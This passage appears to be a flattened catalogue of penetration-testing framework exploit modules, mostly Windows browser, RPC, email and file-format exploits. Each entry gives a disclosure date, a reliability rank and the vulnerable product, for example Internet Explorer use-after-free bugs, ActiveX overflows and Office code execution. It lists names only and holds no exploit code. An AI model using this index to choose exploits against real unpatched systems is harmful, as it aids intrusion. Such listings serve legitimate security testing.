2010-06-09 excellent No Microsoft Help Center XSS and Command Execution - windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution - windows/browser/ms10_090_ie_css_clip 2010-11-03 good No MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption - windows/browser/ms11_003_ie_css_import 2010-11-29 good No MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free - windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal No MS11-050 IE mshtml!CObjectElement Use After Free - windows/browser/ms11_081_option 2012-10-11 normal No MS11-081 Microsoft Internet Explorer Option Element Use-After-Free - windows/browser/ms11_093_ole32 2011-12-13 normal No MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution - windows/browser/ms12_004_midi 2012-01-10 normal No MS12-004 midiOutPlayNextPolyEvent Heap Overflow - windows/browser/ms12_037_ie_colspan 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow - windows/browser/ms12_037_same_id 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption - windows/browser/ms13_009_ie_slayoutrun_uaf 2013-02-13 average No MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free - windows/browser/ms13_022_silverlight_script_object 2013-03-12 normal No MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access - windows/browser/ms13_037_svg_dashstyle 2013-03-06 normal No MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow - windows/browser/ms13_055_canchor 2013-07-09 normal No MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free - windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal No MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free - windows/browser/ms13_069_caret 2013-09-10 normal No MS13-069 Microsoft Internet Explorer CCaret Use-After-Free - windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free - windows/browser/ms13_090_cardspacesigninhelper 2013-11-08 normal No MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow - windows/browser/ms14_012_cmarkup_uaf 2014-02-13 normal No MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free - windows/browser/ms14_012_textrange 2014-03-11 normal No MS14-012 Microsoft Internet Explorer TextRange Use-After-Free - windows/browser/ms14_064_ole_code_execution 2014-11-13 good No MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution - windows/browser/ms16_051_vbscript 2016-05-10 normal No Internet Explorer 11 VBScript Engine Memory Corruption - windows/browser/msvidctl_mpeg2 2009-07-05 normal No Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption - windows/browser/mswhale_checkforupdates 2009-04-15 normal No Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow - windows/browser/msxml_get_definition_code_exec 2012-06-12 good No MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption - windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal No NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow - windows/browser/nis2004_antispam 2004-03-19 normal No Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow - windows/browser/nis2004_get 2007-05-16 normal No Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow - windows/browser/notes_handler_cmdinject 2012-06-18 excellent No IBM Lotus Notes Client URL Handler Command Injection - windows/browser/novell_groupwise_gwcls1_actvx 2013-01-30 normal No Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution - windows/browser/novelliprint_callbackurl 2010-08-20 normal No Novell iPrint Client ActiveX Control call-back-url Buffer Overflow - windows/browser/novelliprint_datetime 2009-12-08 great No Novell iPrint Client ActiveX Control Date/Time Buffer Overflow - windows/browser/novelliprint_executerequest 2008-02-22 normal No Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow - windows/browser/novelliprint_executerequest_dbg 2010-08-04 normal No Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow - windows/browser/novelliprint_getdriversettings 2008-06-16 normal No Novell iPrint Client ActiveX Control Buffer Overflow - windows/browser/novelliprint_getdriversettings_2 2010-11-15 normal No Novell iPrint Client ActiveX Control Buffer Overflow - windows/browser/novelliprint_target_frame 2009-12-08 great No Novell iPrint Client ActiveX Control target-frame Buffer Overflow - windows/browser/ntr_activex_check_bof 2012-01-11 normal No NTR ActiveX Control Check() Method Buffer Overflow - windows/browser/ntr_activex_stopmodule 2012-01-11 normal No NTR ActiveX Control StopModule() Remote Code Execution - windows/browser/oracle_autovue_setmarkupmode 2012-04-18 normal No Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow - windows/browser/oracle_dc_submittoexpress 2009-08-28 normal No Oracle Document Capture 10g ActiveX Control Buffer Overflow - windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution - windows/browser/orbit_connecting 2009-02-03 normal No Orbit Downloader Connecting Log Creation Buffer Overflow - windows/browser/ovftool_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability - windows/browser/pcvue_func 2011-10-05 average No PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability - windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal - windows/browser/quickr_qp2_bof 2012-05-23 normal No IBM Lotus QuickR qp2 ActiveX Buffer Overflow - windows/browser/real_arcade_installerdlg 2011-04-03 normal No Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution - windows/browser/realplayer_cdda_uri 2010-11-15 normal No RealNetworks RealPlayer CDDA URI Initialization Vulnerability - windows/browser/realplayer_console 2008-03-08 normal No RealPlayer rmoc3260.dll ActiveX Control Heap Corruption - windows/browser/realplayer_import 2007-10-18 normal No RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow - windows/browser/realplayer_qcp 2011-08-16 average No RealNetworks Realplayer QCP Parsing Heap Overflow - windows/browser/realplayer_smil 2005-03-01 normal No RealNetworks RealPlayer SMIL Buffer Overflow - windows/browser/roxio_cineplayer 2007-04-11 normal No Roxio CinePlayer ActiveX Control Buffer Overflow - windows/browser/safari_xslt_output 2011-07-20 excellent No Apple Safari Webkit libxslt Arbitrary File Creation - windows/browser/samsung_neti_wiewer_backuptoavi_bof 2012-04-21 normal No Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow - windows/browser/samsung_security_manager_put 2016-08-05 excellent No Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution - windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal No SAP AG SAPgui EAI WebViewer3D Buffer Overflow - windows/browser/siemens_solid_edge_selistctrlx 2013-05-26 normal No Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution - windows/browser/softartisans_getdrivename 2008-08-25 normal No SoftArtisans XFile FileManager ActiveX Control Buffer Overflow - windows/browser/sonicwall_addrouteentry 2007-11-01 normal No SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow - windows/browser/symantec_altirisdeployment_downloadandinstall 2009-09-09 excellent No Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute - windows/browser/symantec_altirisdeployment_runcmd 2009-11-04 normal No Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow - windows/browser/symantec_appstream_unsafe 2009-01-15 excellent No Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute - windows/browser/symantec_backupexec_pvcalendar 2008-02-28 normal No Symantec BackupExec Calendar Control Buffer Overflow - windows/browser/symantec_consoleutilities_browseandsavefile 2009-11-02 normal No Symantec ConsoleUtilities ActiveX Control Buffer Overflow - windows/browser/synactis_connecttosynactis_bof 2013-05-30 normal No Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow - windows/browser/systemrequirementslab_unsafe 2008-10-16 excellent No Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method - windows/browser/teechart_pro 2011-08-11 normal No TeeChart Professional ActiveX Control Trusted Integer Dereference - windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal No Tom Sawyer Software GET Extension Factory Remote Code Execution - windows/browser/trendmicro_extsetowner 2010-08-25 normal No Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution - windows/browser/trendmicro_officescan 2007-02-12 normal No Trend Micro OfficeScan Client ActiveX Control Buffer Overflow - windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow - windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution - windows/browser/ultramjcam_openfiledig_bof 2012-03-28 normal No TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow - windows/browser/ultraoffice_httpupload 2008-08-27 good No Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow - windows/browser/verypdf_pdfview 2008-06-16 normal No VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow - windows/browser/viscom_movieplayer_drawtext 2010-01-12 normal No Viscom Software Movie Player Pro SDK ActiveX 6.8 - windows/browser/vlc_amv 2011-03-23 good No VLC AMV Dangling Pointer Vulnerability - windows/browser/vlc_mms_bof 2012-03-15 normal No VLC MMS Stream Handling Buffer Overflow - windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker - windows/browser/webex_ucf_newobject 2008-08-06 good No WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow - windows/browser/wellintech_kingscada_kxclientdownload 2014-01-14 good No KingScada kxClientDownload.ocx ActiveX Remote Code Execution - windows/browser/winamp_playlist_unc 2006-01-29 great No Winamp Playlist UNC Path Computer Name Overflow - windows/browser/winamp_ultravox 2008-01-18 normal No Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow - windows/browser/windvd7_applicationtype 2007-03-20 normal No WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow - windows/browser/winzip_fileview 2007-11-02 normal No WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow - windows/browser/wmi_admintools 2010-12-21 great No Microsoft WMI Administration Tools ActiveX Buffer Overflow - windows/browser/x360_video_player_set_text_bof 2015-01-30 normal No X360 VideoPlayer ActiveX Control Buffer Overflow - windows/browser/xmplay_asx 2006-11-21 good No XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow - windows/browser/yahoomessenger_fvcom 2007-08-30 normal No Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow - windows/browser/yahoomessenger_server 2007-06-05 good No Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow - windows/browser/zenturiprogramchecker_unsafe 2007-05-29 excellent No Zenturi ProgramChecker ActiveX Control Arbitrary File Download - windows/browser/zenworks_helplauncher_exec 2011-10-19 normal No AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution - windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow - windows/dcerpc/ms05_017_msmq 2005-04-12 good No MS05-017 Microsoft Message Queueing Service Path Overflow - windows/dcerpc/ms07_029_msdns_zonename 2007-04-12 great No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) - windows/dcerpc/ms07_065_msmq 2007-12-11 good No MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow - windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) - windows/email/ms10_045_outlook_ref_only 2010-06-01 excellent No Outlook ATTACH_BY_REF_ONLY File Execution - windows/email/ms10_045_outlook_ref_resolve 2010-06-01 excellent No Outlook ATTACH_BY_REF_RESOLVE File Execution - windows/emc/alphastor_agent 2008-05-27 great No EMC AlphaStor Agent Buffer Overflow - windows/emc/alphastor_device_manager_exec 2013-01-18 excellent Yes EMC AlphaStor Device Manager Opcode 0x75 Command Injection - windows/emc/networker_format_string 2012-08-29 normal No EMC Networker Format String - windows/emc/replication_manager_exec 2011-02-07 great No EMC Replication Manager Command Execution - windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow - windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow - windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File id Parameter Overflow - windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow - windows/fileformat/actfax_import_users_bof 2012-08-28 normal No ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow - windows/fileformat/activepdf_webgrabber 2008-08-26 low No activePDF WebGrabber ActiveX Control Buffer Overflow - windows/fileformat/adobe_collectemailinfo 2008-02-08 good No Adobe Collab.collectEmailInfo() Buffer Overflow - windows/fileformat/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow - windows/fileformat/adobe_flashplayer_button 2010-10-28 normal No Adobe Flash Player "Button" Remote Code Execution - windows/fileformat/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use - windows/fileformat/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow - windows/fileformat/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow - windows/fileformat/adobe_illustrator_v14_eps 2009-12-03 great No Adobe Illustrator CS4 v14.0.0 - windows/fileformat/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Memory Corruption - windows/fileformat/adobe_libtiff 2010-02-16 good No Adobe Acrobat Bundled LibTIFF Integer Overflow - windows/fileformat/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability - windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent No Adobe PDF Embedded EXE Social Engineering - windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript) - windows/fileformat/adobe_reader_u3d 2011-12-06 average No Adobe Reader U3D Memory Corruption Vulnerability - windows/fileformat/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free - windows/fileformat/adobe_u3d_meshdecl 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun - windows/fileformat/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow - windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow - windows/fileformat/altap_salamander_pdb 2007-06-19 good No Altap Salamander 2.5 PE Viewer Buffer Overflow - windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow - windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow - windows/fileformat/apple_quicktime_pnsize 2011-08-08 good No Apple QuickTime PICT PnSize Buffer Overflow - windows/fileformat/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow - windows/fileformat/apple_quicktime_texml 2012-05-15 normal No Apple QuickTime TeXML Style Element Stack Buffer Overflow - windows/fileformat/audio_coder_m3u 2013-05-01 normal No AudioCoder .M3U Buffer Overflow - windows/fileformat/audio_wkstn_pls 2009-12-08 good No Audio Workstation 6.4.2.4.3 pls Buffer Overflow - windows/fileformat/audiotran_pls 2010-01-09 good No Audiotran 1.4.1 (PLS File) Stack Buffer Overflow - windows/fileformat/audiotran_pls_1424 2010-09-09 good No Audiotran PLS File Stack Buffer Overflow - windows/fileformat/aviosoft_plf_buf 2011-11-09 good No Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow - windows/fileformat/bacnet_csv 2010-09-16 good No BACnet OPC Client Buffer Overflow - windows/fileformat/beetel_netconfig_ini_bof 2013-10-12 normal No Beetel Connection Manager NetConfig.ini Buffer Overflow - windows/fileformat/blazedvd_hdtv_bof 2012-04-03 normal No BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability - windows/fileformat/blazedvd_plf 2009-08-03 good No BlazeDVD 6.1 PLF Buffer Overflow - windows/fileformat/boxoft_wav_to_mp3 2015-08-31 normal No Boxoft WAV to MP3 Converter v1.1 Buffer Overflow - windows/fileformat/bpftp_client_bps_bof 2014-07-24 normal No BulletProof FTP Client BPS Buffer Overflow - windows/fileformat/bsplayer_m3u 2010-01-07 normal No BS.Player 2.57 Buffer Overflow (Unicode SEH) - windows/fileformat/ca_cab 2007-06-05 good No CA Antivirus Engine CAB Buffer Overflow - windows/fileformat/cain_abel_4918_rdp 2008-11-30 good No Cain and Abel RDP Buffer Overflow - windows/fileformat/ccmplayer_m3u_bof 2011-11-30 good No CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow - windows/fileformat/chasys_draw_ies_bmp_bof 2013-07-26 normal No Chasys Draw IES Buffer Overflow - windows/fileformat/coolpdf_image_stream_bof 2013-01-18 normal No Cool PDF Image Stream Buffer Overflow - windows/fileformat/corelpdf_fusion_bof 2013-07-08 normal No Corel PDF Fusion Stack Buffer Overflow - windows/fileformat/csound_getnum_bof 2012-02-23 normal No Csound hetro File Handling Stack Buffer Overflow - windows/fileformat/cutezip_bof 2011-02-12 normal No GlobalSCAPE CuteZIP Stack Buffer Overflow - windows/fileformat/cve_2017_8464_lnk_rce 2017-06-13 excellent No LNK Code Execution Vulnerability - windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal No CyberLink LabelPrint 2.5 Stack Buffer Overflow - windows/fileformat/cyberlink_p2g_bof 2011-09-12 great No CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit - windows/fileformat/cytel_studio_cy3 2011-10-02 good No Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow - windows/fileformat/deepburner_path 2006-12-19 great No AstonSoft DeepBurner (DBR File) Path Buffer Overflow - windows/fileformat/destinymediaplayer16 2009-01-03 good No Destiny Media Player 1.61 PLS M3U Buffer Overflow - windows/fileformat/digital_music_pad_pls 2010-09-17 normal No Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow - windows/fileformat/djstudio_pls_bof 2009-12-30 normal No DJ Studio Pro 5.1 .pls Stack Buffer Overflow - windows/fileformat/djvu_imageurl 2008-10-30 low No DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow - windows/fileformat/dupscout_xml 2017-03-29 normal No Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow - windows/fileformat/dvdx_plf_bof 2007-06-02 normal No DVD X Player 5.5 .plf PlayList Buffer Overflow - windows/fileformat/easycdda_pls_bof 2010-06-07 normal No Easy CD-DA Recorder PLS Buffer Overflow - windows/fileformat/emc_appextender_keyworks 2009-09-29 average No EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow - windows/fileformat/erdas_er_viewer_bof 2013-04-23 normal No ERS Viewer 2011 ERS File Handling Buffer Overflow - windows/fileformat/erdas_er_viewer_rf_report_error 2013-05-23 normal No ERS Viewer 2013 ERS File Handling Buffer Overflow - windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow in QUO - windows/fileformat/etrust_pestscan 2009-11-02 average No CA eTrust PestPatrol ActiveX Control Buffer Overflow - windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow - windows/fileformat/fatplayer_wav 2010-10-18 normal No Fat Player Media Player 0.6b0 Buffer Overflow - windows/fileformat/fdm_torrent 2009-02-02 good No Free Download Manager Torrent Parsing Buffer Overflow - windows/fileformat/feeddemon_opml 2009-02-09 great No FeedDemon Stack Buffer Overflow - windows/fileformat/foxit_reader_filewrite 2011-03-05 normal No Foxit PDF Reader 4.2 Javascript File Write - windows/fileformat/foxit_reader_launch 2009-03-09 good No Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow - windows/fileformat/foxit_reader_uaf 2018-04-20 normal No Foxit PDF Reader Pointer Overwrite UAF - windows/fileformat/foxit_title_bof 2010-11-13 great No Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow - windows/fileformat/free_mp3_ripper_wav 2011-08-27 great No Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow - windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow - windows/fileformat/gsm_sim 2010-07-07 normal No GSM SIM Editor 5.15 Buffer Overflow - windows/fileformat/gta_samp 2011-09-18 normal No GTA SA-MP server.cfg Buffer Overflow - windows/fileformat/hhw_hhp_compiledfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/hhw_hhp_contentfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/hhw_hhp_indexfile_bof 2009-01-17 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow - windows/fileformat/homm3_h3m 2015-07-29 normal No Heroes of Might and Magic III .h3m Map file Buffer Overflow - windows/fileformat/ht_mp3player_ht3_bof 2009-06-29 good No HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow - windows/fileformat/ibm_forms_viewer_fontname 2013-12-05 normal No IBM Forms Viewer Unicode Buffer Overflow - windows/fileformat/ibm_pcm_ws 2012-02-28 great No IBM Personal Communications iSeries Access WorkStation 5.9 Profile - windows/fileformat/icofx_bof 2013-12-10 normal No IcoFX Stack Buffer Overflow - windows/fileformat/ideal_migration_ipj 2009-12-05 great No PointDev IDEAL Migration Buffer Overflow - windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow - windows/fileformat/irfanview_jpeg2000_bof 2012-01-16 normal No Irfanview JPEG2000 jp2 Stack Buffer Overflow - windows/fileformat/ispvm_xcf_ispxcf 2012-05-16 normal No Lattice Semiconductor ispVM System XCF File Handling Overflow - windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal No KingView Log File Parsing Buffer Overflow - windows/fileformat/lattice_pac_bof 2012-05-16 normal No Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow - windows/fileformat/lotusnotes_lzh 2011-05-24 good No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) - windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good No Magix Musik Maker 16 .mmm Stack Buffer Overflow - windows/fileformat/mcafee_hercules_deletesnapshot 2008-08-04 low No McAfee Remediation Client ActiveX Control Buffer Overflow - windows/fileformat/mcafee_showreport_exec 2012-01-12 normal No McAfee SaaS MyCioScan ShowReport Remote Command Execution - windows/fileformat/mediacoder_m3u 2013-06-24 normal No MediaCoder .M3U Buffer Overflow - windows/fileformat/mediajukebox 2009-07-01 normal No Media Jukebox 8.0.400 Buffer Overflow (SEH) - windows/fileformat/microp_mppl 2010-08-23 great No MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow - windows/fileformat/millenium_mp3_pls 2009-07-30 great No Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow - windows/fileformat/mini_stream_pls_bof 2010-07-16 great No Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow - windows/fileformat/mjm_coreplayer2011_s3m 2011-04-30 good No MJM Core Player 2011 .s3m Stack Buffer Overflow - windows/fileformat/mjm_quickplayer_s3m 2011-04-30 good No MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow - windows/fileformat/moxa_mediadbplayback 2010-10-19 average No MOXA MediaDBPlayback ActiveX Control Buffer Overflow - windows/fileformat/mplayer_m3u_bof 2011-03-19 average No MPlayer Lite M3U Buffer Overflow - windows/fileformat/mplayer_sami_bof 2011-05-19 normal No MPlayer SAMI Subtitle File Buffer Overflow - windows/fileformat/ms09_067_excel_featheader 2009-11-10 good No MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability - windows/fileformat/ms10_004_textbytesatom 2010-02-09 good No MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow - windows/fileformat/ms10_038_excel_obj_bof 2010-06-08 normal No MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow - windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great No MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) - windows/fileformat/ms11_006_createsizeddibsection 2010-12-15 great No MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow - windows/fileformat/ms11_021_xlb_bof 2011-08-09 normal No MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow - windows/fileformat/ms12_005 2012-01-10 excellent No MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability - windows/fileformat/ms12_027_mscomctl_bof 2012-04-10 average No MS12-027 MSCOMCTL ActiveX Buffer Overflow - windows/fileformat/ms13_071_theme 2013-09-10 excellent No MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution - windows/fileformat/ms14_017_rtf 2014-04-01 normal No MS14-017 Microsoft Word RTF Object Confusion - windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution - windows/fileformat/ms14_064_packager_python 2014-11-12 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python - windows/fileformat/ms14_064_packager_run_as_admin 2014-10-21 excellent No MS14-064 Microsoft Windows OLE Package Manager Code Execution - windows/fileformat/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution - windows/fileformat/ms15_100_mcl_exe 2015-09-08 excellent No MS15-100 Microsoft Windows Media Center MCL Vulnerability - windows/fileformat/ms_visual_basic_vbp 2007-09-04 good No Microsoft Visual Basic VBP Buffer Overflow - windows/fileformat/mswin_tiff_overflow 2013-11-05 average No MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow - windows/fileformat/msworks_wkspictureinterface 2008-11-28 low No Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution - windows/fileformat/mymp3player_m3u 2010-03-18 good No Steinberg MyMP3Player 3.0 Buffer Overflow - windows/fileformat/netop 2011-04-28 normal No NetOp Remote Control Client 9.5 Buffer Overflow - windows/fileformat/nitro_reader_jsapi 2017-07-24 excellent No Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution - windows/fileformat/nuance_pdf_launch_overflow 2010-10-08 great No Nuance PDF Reader v6.0 Launch Stack Buffer Overflow - windows/fileformat/office_dde_delivery 2017-10-09 manual No Microsoft Office DDE Payload Delivery - windows/fileformat/office_ms17_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882 - windows/fileformat/office_ole_multiple_dll_hijack 2015-12-08 normal No Office OLE Multiple DLL Side Loading Vulnerabilities - windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution - windows/fileformat/openoffice_ole 2008-04-17 normal No OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow - windows/fileformat/orbit_download_failed_bof 2008-04-03 normal No Orbit Downloader URL Unicode Conversion Overflow - windows/fileformat/orbital_viewer_orb 2010-02-27 great No Orbital Viewer ORB File Parsing Buffer Overflow - windows/fileformat/ovf_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability - windows/fileformat/proshow_cellimage_bof 2009-08-20 great No ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow - windows/fileformat/proshow_load_bof 2012-06-06 normal No Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow - windows/fileformat/publishit_pui 2014-02-05 normal No Publish-It PUI Buffer Overflow (SEH) - windows/fileformat/real_networks_netzip_bof 2011-01-30 good No Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow Vulnerability - windows/fileformat/real_player_url_property_bof 2012-12-14 normal No RealPlayer RealMedia File Handling Buffer Overflow - windows/fileformat/realplayer_ver_attribute_bof 2013-12-20 normal No RealNetworks RealPlayer Version Attribute Buffer Overflow - windows/fileformat/safenet_softremote_groupname 2009-10-30 good No SafeNet SoftRemote GROUPNAME Buffer Overflow - windows/fileformat/sascam_get 2008-12-29 low No SasCam Webcam Server v.2.6.5 Get() Method Buffer Overflow - windows/fileformat/scadaphone_zip 2011-09-12 good No ScadaTEC ScadaPhone Stack Buffer Overflow - windows/fileformat/shadow_stream_recorder_bof 2010-03-29 normal No Shadow Stream Recorder 3.0.1.7 Buffer Overflow - windows/fileformat/shaper_pdf_bof 2015-10-03 normal No PDF Shaper Buffer Overflow - windows/fileformat/somplplayer_m3u 2010-01-22 great No S.O.M.P.L 1.0 Player Buffer Overflow - windows/fileformat/subtitle_processor_m3u_bof 2011-04-26 normal No Subtitle Processor 7.7.1 .M3U SEH Unicode Buffer Overflow - windows/fileformat/syncbreeze_xml 2017-03-29 normal No Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow - windows/fileformat/tfm_mmplayer_m3u_ppl_bof 2012-03-23 good No TFM MMPlayer (m3u/ppl File) Buffer Overflow - windows/fileformat/total_video_player_ini_bof 2013-11-24 normal No Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow - windows/fileformat/tugzip 2008-10-28 good No TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability - windows/fileformat/ultraiso_ccd 2009-04-03 great No UltraISO CCD File Parsing Buffer Overflow - windows/fileformat/ultraiso_cue 2007-05-24 great No UltraISO CUE File Parsing Buffer Overflow - 